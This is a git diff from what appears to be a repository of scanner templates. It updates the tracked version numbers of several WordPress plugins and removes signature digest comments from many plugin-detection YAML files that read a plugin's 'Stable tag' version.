.../plugins/woocommerce-pdf-invoices-packing-slips.txt | 2 +- helpers/wordpress/plugins/wp-statistics.txt | 2 +- helpers/wordpress/plugins/yith-woocommerce-wishlist.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - http/technologies/wordpress/plugins/chaty.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/hostinger.yaml | 1 - http/technologies/wordpress/plugins/image-optimization.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/metform.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/simple-history.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/templately.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../technologies/wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-crontrol.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-seopress.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 212 files changed, 12 insertions(+), 212 deletions(-) diff --git a/helpers/wordpress/plugins/advanced-custom-fields.txt b/helpers/wordpress/plugins/advanced-custom-fields.txt index d9b300f1c8..9152abbe6c 100644 --- a/helpers/wordpress/plugins/advanced-custom-fields.txt +++ b/helpers/wordpress/plugins/advanced-custom-fields.txt @@ -1 +1 @@ -6.3.3 \ No newline at end of file +6.3.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/all-in-one-seo-pack.txt b/helpers/wordpress/plugins/all-in-one-seo-pack.txt index b3a44c11bc..5262914a71 100644 --- a/helpers/wordpress/plugins/all-in-one-seo-pack.txt +++ b/helpers/wordpress/plugins/all-in-one-seo-pack.txt @@ -1 +1 @@ -4.6.6 \ No newline at end of file +4.6.7.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/duplicator.txt b/helpers/wordpress/plugins/duplicator.txt index 0edd95ce64..90084a1028 100644 --- a/helpers/wordpress/plugins/duplicator.txt +++ b/helpers/wordpress/plugins/duplicator.txt @@ -1 +1 @@ -1.5.10 \ No newline at end of file +1.5.10.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/forminator.txt b/helpers/wordpress/plugins/forminator.txt index f0fed9186c..2404d95902 100644 --- a/helpers/wordpress/plugins/forminator.txt +++ b/helpers/wordpress/plugins/forminator.txt @@ -1 +1 @@ -1.33.0 \ No newline at end of file +1.34.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/nextgen-gallery.txt b/helpers/wordpress/plugins/nextgen-gallery.txt index 456ad318e1..c436be92cf 100644 --- a/helpers/wordpress/plugins/nextgen-gallery.txt +++ b/helpers/wordpress/plugins/nextgen-gallery.txt @@ -1 +1 @@ -3.59.3 \ No newline at end of file +3.59.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/redux-framework.txt b/helpers/wordpress/plugins/redux-framework.txt index b3b7272746..c78ad566ee 100644 --- a/helpers/wordpress/plugins/redux-framework.txt +++ b/helpers/wordpress/plugins/redux-framework.txt @@ -1 +1 @@ -4.4.17 \ No newline at end of file +4.4.18 \ No newline at end of file diff --git a/helpers/wordpress/plugins/royal-elementor-addons.txt b/helpers/wordpress/plugins/royal-elementor-addons.txt index 02922966cf..ecccfd45f0 100644 --- a/helpers/wordpress/plugins/royal-elementor-addons.txt +++ b/helpers/wordpress/plugins/royal-elementor-addons.txt @@ -1 +1 @@ -1.3.980 \ No newline at end of file +1.3.981 \ No newline at end of file diff --git a/helpers/wordpress/plugins/the-events-calendar.txt b/helpers/wordpress/plugins/the-events-calendar.txt index 7160867089..fa09f584d7 100644 --- a/helpers/wordpress/plugins/the-events-calendar.txt +++ b/helpers/wordpress/plugins/the-events-calendar.txt @@ -1 +1 @@ -6.5.1.6 \ No newline at end of file +6.5.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-payments.txt b/helpers/wordpress/plugins/woocommerce-payments.txt index ac2f3747d9..e048e60ec1 100644 --- a/helpers/wordpress/plugins/woocommerce-payments.txt +++ b/helpers/wordpress/plugins/woocommerce-payments.txt @@ -1 +1 @@ -7.9.1 \ No newline at end of file +7.9.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt b/helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt index 8c1da59dbb..b916322161 100644 --- a/helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt +++ b/helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt @@ -1 +1 @@ -3.8.5 \ No newline at end of file +3.8.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-statistics.txt b/helpers/wordpress/plugins/wp-statistics.txt index 94837c4cfb..385495e93e 100644 --- a/helpers/wordpress/plugins/wp-statistics.txt +++ b/helpers/wordpress/plugins/wp-statistics.txt @@ -1 +1 @@ -14.9 \ No newline at end of file +14.9.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/yith-woocommerce-wishlist.txt b/helpers/wordpress/plugins/yith-woocommerce-wishlist.txt index aebeef10b5..ebb8439a9b 100644 --- a/helpers/wordpress/plugins/yith-woocommerce-wishlist.txt +++ b/helpers/wordpress/plugins/yith-woocommerce-wishlist.txt @@ -1 +1 @@ -3.35.0 \ No newline at end of file +3.36.0 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 7294fee20d..3fd2256749 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207d8264cb41d084d924ab27da18b8e1878a8c6082f3705b67f5005e820819d7d8022071824bab6ef8967f332c0b4c240b22283cee7159f3242f7c495d74229a7c96de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 12b6ceed74..6a0d344b63 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b09c83a35202530f5674cf0162c051e550c5d930026c1a016d8afb7c6e82fe1d022100a56888f8874e10ee1f2a758024071cd110222b404b81e4bf9091a4546142d58e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 233fc0e12e..6fb5080bc8 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210098ec6acf124d4957b5be25306863cd5aca0d7007b22337563cc7d7268be361ba02205fe370ac400834b5f5b145bcea71cf14b3b4c1e8d547698f3c8f0ce910ee4af1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 68ce005bca..cddbb4bb2e 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a3d0a1291dbff7d489f6500ef043f3ed95c7d687a83e6e9a6f9545a1b9c95c16022100c2ab30bef395226c628b524689200a8a87846d7a3a1891bda1721d432c69ae5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index fb14571ef2..6f253f9f55 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f2c41b2ac826e293bd72b8951ef08c18689ea4ac3586059f52efd92be0bfff9702210086d5bfc5d876cd809670df2eb92fa57137b6a89e5c32d29c066c203c629f0c37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 77b9ddd426..fe45de4d04 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022004ebd1407272c47abe5f95ed5b16e20acdbb6f97b6b18a6ca6436dd7d348c8cd022100c4280b49d4b802ba8e3c50612dd2e79e28a21676e5418127e84ad684ecf39974:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index e691241197..69e425f446 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ab0041fbfb467d29762c38742333770f27bae401f080c5b04f2b8600e01d8e94022100e9015fa86b050c34e2830afc8c965510e916f1f2b03230e803824ecda43db5a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 3425470a04..9c07c65e4e 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201cd2f72d306152c64d2e3a5fa5be30a28d1b9ded88df8a1c5af5e614f8aa2975022039eaf736b6d00bfd3a23259cc5cbe2808f5ada5204084ad9bddc054816c7c467:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 950ac02336..92c8f5656e 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e63b172160f629921b1437f5acd216e19485766bef7e1553b17343f4ff8d5f2e022039befdad83cd4abbad9156493f8978bfd2cc1b0460ab99f5bacbc88c4288241f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 91402f27b0..70975a19a1 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022039219583fefb847c887bb3a057568cc19a0952d0bfddabf572cc4b962fd5bc7202207cc983bbe309d767c00452dbdef84a20558cf9dba707d9d640302b82d2b1ef9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 9a08801507..fd7e3e99dd 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cf90139b0a76721843f09e9963f871702af9876f299ee6e830769d9c41a2bd6c0221009b6cb0ac719e92e4fed2911a296c1820d2bac746536b69a4a20219fa85ca4a36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index ef469f4de8..18f2a2ae84 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d37ed54e05539b172f856d88ab0ad0bbe831bf6cb697a63e32d409d7def47a0f02206c64d32c181ae660d81fd3426941e97eaacd915449a12d9584d4d929badb510c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 905db4987b..11cb41fb2c 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207e889b24189d5e3275050236fe62b6694666885f3d1cdcb408926e40903d3005022100ceb8749b3e1c21cff3869c355762782e9ecc33fcbe7b549aeb42f81a1ed66f28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 6d7382bd40..df3c5f3a94 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206c3c0c362d74f33892f89809eaa4879a0d95f781fd1f48531c6421d0a39bf798022100b2235110955c0d39b7328f4f923d56c8d23ce47cb56c8011a7879cdbd4f88432:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 7ceb6cca2b..6a50e049dc 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cc850d18a05f8c5a4738bc04027282e0ac4749fffc75623ec9a572b753bbb2a9022045a1c5e09f708ce17f06bdfba41bc603af1f0053911b8a42a77923e422e88dc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index d9a18e167b..e532694167 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220477b4c24de2ce0f1e41ba5965ca00f8838c66530916597a3f4f3e5e7cff75ac7022100e2a499fb320e31de783ed7573fe64752703689bfe4a3974e6520bce7ae2603c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 10e7ce3d26..4c6e616c1d 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022029bae92aa94ceff664bf2bf6e7953f9b7e6d8a4de210553cf198734ad684083302202c583951ee5320cb9d07eb8ffd6de93576ed07a6cb59395da2f793a51d351664:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index c165c221cb..a70a58690c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203cd797a5ed9584ef77e5b9f5d1af5ca5f645627774722f8754f930e19cc27de902204614a0369e3e4000e23441735f06132ba33bb537b92cc48f0d6a63e684d40f1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 2f8436385f..4e3c68c53a 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207c11daa0129e75d7b3711cd953417c794e43fc78d574c5bfc21b9a9a08ea6ea9022100e19b775c30d7fea51e350ede1c3d0dbd2da07cc6121e196bbc145c50b35e04e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 6c9cdfc188..0cd866179e 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203be264a31f7e42071938c9b2a6f6debd653c3712ec0a5f6cfa1c45e3f66e4f9802205c5ccb6e474b3b435bf9e8cc0484e4f97e5ce7373271c1cac9dfbdb1bf39a1b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 1d699ff91c..b1d8479d13 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 